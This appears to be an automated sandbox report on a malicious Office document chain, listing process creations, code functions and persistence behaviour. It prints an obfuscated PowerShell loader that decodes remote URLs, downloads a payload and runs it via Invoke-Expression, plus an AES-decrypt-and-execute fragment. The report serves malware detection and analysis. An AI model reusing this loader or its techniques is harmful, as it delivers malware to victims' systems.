Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

16_2_0041CB50

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 10_2_00288A1F push esp; iretd	10_2_00288A21
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 10_2_0027C2BC pushad ; ret	10_2_0027C339
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 10_2_0027C289 pushad ; ret	10_2_0027C339
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 10_2_0027C2E2 pushad ; ret	10_2_0027C339
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 10_2_00285713 push esp; iretd	10_2_00285715
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 10_2_0027C1FC pushad ; ret	10_2_0027C339
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00457106 push ecx; ret	16_2_00457119
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0045B11A push esp; ret	16_2_0045B141
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_0045E54D push esi; ret	16_2_0045E556
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00457A28 push eax; ret	16_2_00457A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00434E56 push ecx; ret	16_2_00434E69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_10002806 push ecx; ret	16_2_10002819
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_0044693D push ecx; ret	18_2_0044694D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_0044DB70 push eax; ret	18_2_0044DB84
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_0044DB70 push eax; ret	18_2_0044DBAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_00451D54 push eax; ret	18_2_00451D61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0044B090 push eax; ret	19_2_0044B0A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_0044B090 push eax; ret	19_2_0044B0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00451D34 push eax; ret	19_2_00451D41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00444E71 push ecx; ret	19_2_00444E81
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00414060 push eax; ret	21_2_00414074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00414060 push eax; ret	21_2_0041409C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00414039 push ecx; ret	21_2_00414049
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_004164EB push 0000006Ah; retf	21_2_004165C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00416553 push 0000006Ah; retf	21_2_004165C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00416555 push 0000006Ah; retf	21_2_004165C4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_00462210 push eax; mov dword ptr [esp], ecx	22_2_0046269C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_00462690 push eax; mov dword ptr [esp], ecx	22_2_0046269C

Persistence and Installation Behavior

Microsoft Office launches external ms-search protocol handler (WebDAV)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \Device\RdpDr\;:1\hq.ax\DavWWWRoot			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \Device\RdpDr\;:1\hq.ax\DavWWWRoot			Jump to behavior

AI detected suspicious Excel or Word document

Source: Office document

LLM: Score: 9 Reasons: The screenshot contains a visually prominent Microsoft Office logo and a message stating 'This document is protected'. The text instructs the user to 'Enable Content' to view the document, which is a common tactic used in phishing attacks to trick users into enabling macros that can execute malicious code. The use of the Microsoft Office branding is likely an attempt to impersonate a well-known brand to gain the user's trust. The instructions create a sense of urgency by implying that the document cannot be viewed without following the steps provided. This combination of factors indicates a high risk of phishing or malware.

Installs new ROOT certificates

Source: C:\Windows\SysWOW64\wscript.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob

Jump to behavior

Office drops RTF file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File dump: createdgoodthingstogetmebacktheentirethingsinolineswitchtogilfrnfboobstounderstandhowfeelurareinthesituation_____________creanthesituationgirlfrnd[1].doc.0.dr			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File dump: 715CC54E.doc.3.dr			Jump to dropped file

Office viewer loads remote template

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Section loaded: netapi32.dll and davhlpr.dll loaded

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_00406EB0 ShellExecuteW,URLDownloadToFileW,

16_2_00406EB0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

16_2_0041AA4A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

16_2_0041CB50

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
